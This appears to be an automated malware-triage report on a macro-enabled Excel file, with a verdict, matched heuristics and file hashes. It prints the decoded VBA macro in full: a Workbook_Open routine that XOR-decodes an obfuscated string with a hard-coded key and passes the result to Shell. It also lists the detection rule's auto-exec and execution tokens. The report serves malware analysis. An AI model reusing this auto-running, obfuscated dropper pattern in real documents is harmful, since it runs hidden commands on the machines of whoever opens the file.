Verdict: MALICIOUS
Risk score: 130
Heuristics matched: 5
- VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 3 related findings). Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL). Potential Shell call in VBA. Matched line in script: Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN). Workbook_Open macro. Matched line in script: Public Sub Workbook_Open()
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3386 bytes |

SHA-256: 848e2e71c218d22d14c5b3ef64ae890fc6107f4bf973b1a45fcdc3a8b7d003b5
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s)).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Dim Z×°Ÿ³ÇŸº³ì•¾™™¹¾y††Déºà½Y´–Œ•…¤°¹œ½½•¶°i¥–ņ•¼³±œ§†XØ As String
Dim ¤i•ÌÕ•m••»¾OÕœàì¼Õñöyñº½ñ½œø°´¹§†È¼±•¾·à¬™†¾¾ÌO×B€•â¾™½ As String
Dim é–¤´–·•±Õ•ñ°î±º³ñ„Â¼é¹§àœ±•¾â¥•Œ•´½ÇNZ……½ä¹§øN»§´‚Ÿ°ñ± As String
Dim o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª As String
Dim cc As String
Dim •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ As String
•§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ = "intXOintXOrValue1rVintXOrValue1alue1"
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ + (Replace(a("XXXXXXX", "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"), " xX " + cc, ""))
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = Replace(o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª, •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚, "")
Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
End Sub
Public Function a(CodeKey As String, DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
a = strDataOut
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 15872 bytes |

SHA-256: a3b7735144f16243ecbb11276ee7309945b5e80fa7ab85b1821793ea72040363
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s)).